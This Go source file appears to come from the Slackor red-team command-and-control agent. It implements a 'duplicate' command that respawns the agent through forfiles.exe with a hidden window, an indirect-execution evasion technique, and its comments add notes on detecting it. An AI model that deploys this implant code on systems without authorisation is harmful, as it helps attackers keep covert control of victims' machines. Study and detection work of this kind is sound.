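// Source: github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/pkg/windows/duplicate.go

// +build windows

package windows

import (
	"bytes"
	"fmt"
	"os"
	"os/exec"
	"syscall"

	"github.com/Coalfire-Research/Slackor/pkg/command"
)

// Duplicate spawns a new agent using forfiles.exe.
//
// The agent does not start its copy directly: it asks the signed Windows
// utility forfiles.exe to run the agent's own executable (os.Args[0]), so the
// new process is created by forfiles.exe rather than by the running agent.
// MITRE ATT&CK tracks this pattern as T1202 (Indirect Command Execution).
//
// Detection notes: the forfiles.exe command line built in Run is fixed except
// for the final path, so process-creation telemetry (Windows Security event
// 4688 with command-line auditing, or Sysmon event ID 1) is the place to look.
// forfiles.exe invoked with "/p c:\windows\system32 /m svchost.exe /c <path>",
// or forfiles.exe appearing as the parent of a non-system binary, is the
// signal; the expected process tree is agent -> forfiles.exe -> agent.
type Duplicate struct{}

// Name is the name of the command.
func (d Duplicate) Name() string {
	return "duplicate"
}

// Run spawns a new agent using forfiles.exe.
//
// clientID, jobID and args are accepted to satisfy the command interface but
// are not read here. On success Run returns "Duplicated <os.Args[0]>."; if
// forfiles.exe cannot be started or exits with an error, Run returns an empty
// string and the error from cmd.Run unchanged.
func (d Duplicate) Run(clientID string, jobID string, args []string) (string, error) {
	cmdName := "forfiles.exe"
	// /p and /m select exactly the file svchost.exe in system32; forfiles runs
	// the /c command once per matching file, so the command runs once.
	cmdArgs := []string{"/p", `c:\windows\system32`, "/m", "svchost.exe", "/c", os.Args[0]}
	// The original built exec.Command(cmdName) first and then immediately
	// overwrote it with this call; the dead first construction is removed.
	cmd := exec.Command(cmdName, cmdArgs...)
	// NOTE(review): both buffers are filled but never read, so any diagnostic
	// output from forfiles.exe is discarded.
	var out bytes.Buffer
	var stderr bytes.Buffer
	cmd.Stdout = &out
	cmd.Stderr = &stderr
	// HideWindow starts forfiles.exe without a visible window, so nothing is
	// shown on the desktop; the process still appears in process-creation logs.
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	if err := cmd.Run(); err != nil {
		return "", err
	}
	return fmt.Sprintf("Duplicated %s.", os.Args[0]), nil
}

// init registers Duplicate with the command package at package load time.
func init() {
	command.RegisterCommand(Duplicate{})
}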